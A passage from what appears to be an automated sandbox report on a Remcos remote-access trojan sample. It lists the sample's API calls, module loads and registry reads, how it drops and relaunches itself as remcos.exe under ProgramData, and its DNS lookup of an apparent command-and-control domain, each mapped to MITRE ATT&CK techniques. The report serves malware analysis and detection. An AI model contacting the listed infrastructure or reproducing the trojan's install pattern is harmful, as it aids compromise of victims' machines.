\"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter getaddrinfo (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter getnameinfo (UID: 00000000-00005076)\n \"remcos.exe\" called \"GetProcAddress\" with a parameter freeaddrinfo (UID: 00000000-00005076)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03ea572@ADVAPI32.dll\"\n \"0e000f00703fa572@ADVAPI32.dll\"\n \"0e000f00cc3fa572@ADVAPI32.dll\"\n \"11001200b447a572@ADVAPI32.dll\"\n \"110012004848a572@ADVAPI32.dll\"\n \"120013008c48a572@ADVAPI32.dll\"\n \"12001300e448a572@ADVAPI32.dll\"\n \"14001500dc6fa572@ADVAPI32.dll\"\n \"14001500f46fa572@ADVAPI32.dll\"\n \"140015000c70a572@ADVAPI32.dll\"\n \"170018002470a572@ADVAPI32.dll\"\n \"0d000e003c70a572@ADVAPI32.dll\"\n \"110012004c70a572@ADVAPI32.dll\"\n \"110012006070a572@ADVAPI32.dll\"\n \"0d000e00f066a572@WININET.dll\"\n \"0d000e006067a572@WININET.dll\"\n \"100011009867a572@WININET.dll\"\n \"100011003c68a572@WININET.dll\"\n \"10001100a470a572@WININET.dll\"\n \"10001100b870a572@WININET.dll\"\n \"14001500cc70a572@WININET.dll\"\n \"14001500e470a572@WININET.dll\"\n \"12001300fc70a572@WININET.dll\"\n \"120013001071a572@WININET.dll\"\n \"100011007c68a572@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"CreateDirectoryW\" with parameter %ALLUSERSPROFILE%\\Remcos (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00002984)\n \"remcos.exe\" called \"CreateDirectoryW\" with parameter %ALLUSERSPROFILE%\\Remcos (UID: 00000000-00001348)\n \"remcos.exe\" called \"CreateDirectoryW\" with parameter %ALLUSERSPROFILE%\\remcos (UID: 00000000-00001348)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"CreateProcessW\" with parameter \"\"%ALLUSERSPROFILE%\\Remcos\\remcos.exe\"\" - (UID: 00000000-00002984)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:2024\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"amarre2024.kozow.com\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2\" has an executable section named \".text\"\n \"remcos.exe.bin\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2\" has an writable section named \".data\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2\" has an writable section named \".tls\"\n \"remcos.exe.bin\" has an writable section named \".data\"\n \"remcos.exe.bin\" has an writable section named \".tls\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"remcos.exe.bin\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71160000\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" loaded module \"KERNEL32\" at base 762d0000\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" loaded module \"USER32\" at base 77520000\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" loaded module \"NTDLL\" at base 77a70000\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" loaded module \"SHELL32\" at base 763b0000\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" loaded module \"SHLWAPI\" at base 77c60000\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" loaded module \"IPHLPAPI\" at base 73cd0000\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" loaded module \"RSTRTMGR\" at base 6dde0000\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" loaded module \"KERNEL32.DLL\" at base 762d0000\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" loaded module \"OLE32.DLL\" at base 75df0000\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" loaded module \"CRYPTBASE.DLL\" at base 75870000\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 745b0000\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" loaded module \"ADVAPI32.DLL\" at base 77090000\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" loaded module \"PROPSYS.DLL\" at base 74670000\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" loaded module \"COMCTL32.DLL\" at base 74840000\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" loaded module \"OLEAUT32.DLL\" at base 76020000\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" loaded module \"SHELL32.DLL\" at base 763b0000\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" loaded module \"CLBCATQ.DLL\" at base 77000000\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74670000\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" loaded module \"NTMARTA.DLL\" at base 74de0000\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77bf0000\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" loaded module \"PROFAPI.DLL\" at base 75980000\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 76180000\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" loaded module \"SECUR32.DLL\" at base 756a0000\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" loaded module \"RPCRT4.DLL\" at base 75d40000\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75c90000\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 71860000\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 762d0000\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" loaded module \"SETUPAPI.DLL\" at base 775f0000\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75820000\n \"remcos.exe\" loaded module \"RSTRTMGR\" at base 6dde0000\n \"remcos.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71160000\n \"remcos.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"remcos.exe\" loaded module \"KERNEL32\" at base 762d0000\n \"remcos.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"remcos.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 72a20000\n \"remcos.exe\" loaded module \"SSPICLI.DLL\" at base 75800000\n \"remcos.exe\" loaded module \"RPCRT4.DLL\" at base 75d40000\n \"remcos.exe\" loaded module \"API-MS-WIN-CORE-SYSINFO-L1-2-1\" at base 0\n \"remcos.exe\" loaded module \"KERNEL32.DLL\" at base 762d0000\n \"remcos.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WS2_32\" at base 75d00000\n \"remcos.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 75340000\n \"remcos.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74ea0000\n \"remcos.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 75330000\n \"remcos.exe\" loaded module \"DNSAPI.DLL\" at base 75200000\n \"remcos.exe\" loaded module \"IPHLPAPI.DLL\" at base 73cd0000\n \"remcos.exe\" loaded module \"RASADHLP.DLL\" at base 71d20000\n \"remcos.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 73c00000\n \"remcos.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 71f30000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"LoadLibrary\" with a parameter Shell32 (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"LoadLibrary\" with a parameter Shlwapi (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"LoadLibrary\" with a parameter Iphlpapi (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"LoadLibrary\" with a parameter Rstrtmgr (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00002984)\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00002984)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter Rstrtmgr (UID: 00000000-00001348)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001348)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001348)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001348)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001348)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00001348)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-sysinfo-l1-2-1 (UID: 00000000-00001348)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ws2_32 (UID: 00000000-00001348)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005076)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005076)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005076)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005076)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00005076)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-sysinfo-l1-2-1 (UID: 00000000-00005076)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ws2_32 (UID: 00000000-00005076)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"remcos.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"remcos.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"remcos.exe\" failed to load missing module \"api-ms-win-core-sysinfo-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75D40000\n \"remcos.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75D40000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"remcos.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"remcos.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"remcos.exe\" (UID: 00000000-00001348) was launched with new environment variables: \"USERDNSDOMAIN=\"%OSUSER%-PC\"\"\n Process \"remcos.exe\" (UID: 00000000-00001348) was launched with modified environment variables: \"NUMBER_OF_PROCESSORS\"\n Process \"remcos.exe\" (UID: 00000000-00005076) was launched with new environment variables: \"PROMPT=\"$P$G\"\"\n Process \"remcos.exe\" (UID: 00000000-00005076) was launched with modified environment variables: \"PSModulePath, PATHEXT, NUMBER_OF_PROCESSORS\"\n Process \"remcos.exe\" (UID: 00000000-00005076) was launched with missing environment variables: \"USERDNSDOMAIN\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"remcos.exe\" (UID: 00000000-00001348)\n Spawned process \"remcos.exe\" (UID: 00000000-00005076)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"remcos.exe\" (UID: 00000000-00001348)\n Spawned process \"remcos.exe\" (UID: 00000000-00005076)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"remcos.exe.bin\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"remcos.exe.bin\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"remcos.exe.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2\" was detected as \"VC8 -> Microsoft Corporation\"\n \"remcos.exe.bin\" was detected as \"VC8 -> Microsoft Corporation\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" trying to access non-existent file \"C:\\WINMM.dll\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" trying to access non-existent file \"C:\\shcore.DLL\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" trying to access non-existent file \"C:\\Windows\\system32\\shcore.DLL\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" trying to access non-existent file \"C:\\Windows\\system\\shcore.DLL\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" trying to access non-existent file \"C:\\Windows\\shcore.DLL\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" trying to access non-existent file \"C:\\ProgramData\\Oracle\\Java\\javapath\\shcore.DLL\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" trying to access non-existent file \"C:\\Windows\\System32\\Wbem\\shcore.DLL\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" trying to access non-existent file \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\shcore.DLL\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" trying to access non-existent file \"C:\\Iphlpapi.DLL\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" trying to access non-existent file \"C:\\WINNSI.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"remcos.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" reads file \"c:\\e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" reads file \"c:\\programdata\\remcos\\remcos.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"e7e2a03337c038a0b3c5aca1bf4a2c369cb92a02cf6b1487fdeeac3893671fa2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n 